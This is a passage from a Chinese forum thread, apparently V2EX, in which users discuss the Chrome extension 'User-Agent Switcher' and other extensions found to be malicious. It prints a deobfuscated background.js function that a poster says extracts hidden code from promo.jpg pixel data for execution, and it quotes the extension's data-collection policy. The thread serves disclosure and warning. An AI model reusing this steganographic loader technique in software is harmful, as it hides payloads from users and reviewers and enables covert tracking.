https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake
background.js 的第 80 行,从这个图片里解密出恶意代码并执行
t.prototype.Vh = function(t, e) {
if ("" === '../promo.jpg') return "";
void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
var n = this.ET,
i = e.mp || n.mp,
o = e.Tv || n.Tv,
h = e.At || n.At,
a = r.Yb(Math.pow(2, i)),
f = (e.WC || n.WC, e.TY || n.TY),
u = document.createElement("canvas"),
p = u.getContext("2d");
if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
var c = p.getImageData(0, 0, u.width, u.height),
d = c.data,
g = [];
if (c.data.every(function(t) {
return 0 === t
})) return "";
var m, s;
if (1 === o)
for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
var v = "",
w = 0,
y = 0,
l = Math.pow(2, h) - 1;
for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
}
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm
https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah
https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg
这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619
101
chanssl 2017-09-10 20:09:20 +08:00
日狗了,竟然是恶意程序,中奖了
|
102
Bailang 2017-09-10 21:15:38 +08:00
|
103
chroming 2017-09-10 22:54:44 +08:00
突然发现去年就有人发现这个扩展有问题了: https://www.v2ex.com/t/263719
|
104
Bailang 2017-09-11 09:52:04 +08:00
转载 侵删
https://x.threatbook.cn/article?threatInfoID=113 有人贴出了这个 policy Collected Information. Accessing and Using the Services. When users access or use the Services, certain non-personally and personally identifiable information (the "User Information") is collected, stored and used for business and marketing purposes, such as maintaining and improving the Services, conducting research, and monetization. This User Information includes, without limitation: IP address, unique identifier number, operating system, browser information, URLs visited, data from URLs loaded and pages viewed, search queries entered, social connections, profile properties, contact details, usage data, and other behavioral, software and hardware information. If you access the Services from a mobile or other device, we may collect a unique device identifier assigned to that device or other information for that device in order to serve content to it. This collected data may also be supplemented with information obtained from third parties or submitted by users. |
105
nyanyh 2017-09-11 11:52:12 +08:00
@acess omg...我还用着 Better History,有时候 Surge 里看到随机的 dwoqpurpfdjksla.lan 这种奇怪的域名不知道是不是这个扩展搞的
|
107
cyg07 2017-09-20 19:10:53 +08:00
@redsonic @anoymoux @xssnull
360CERT 的具体分析 "Chrome 插件 User – Agent Switcher 恶意代码分析报告 " http://mp.weixin.qq.com/s/iqXL7VQxdX6T7UVwj5PBHw |
108
ariza 2017-09-22 10:23:32 +08:00
为毛依然屹立不倒。。
|
110
lyragosa 2017-10-18 23:32:49 +08:00
我似乎就是这个插件……吓得我赶紧删掉了
|
112
legege007 2020-09-05 20:48:27 +08:00
已下架了
|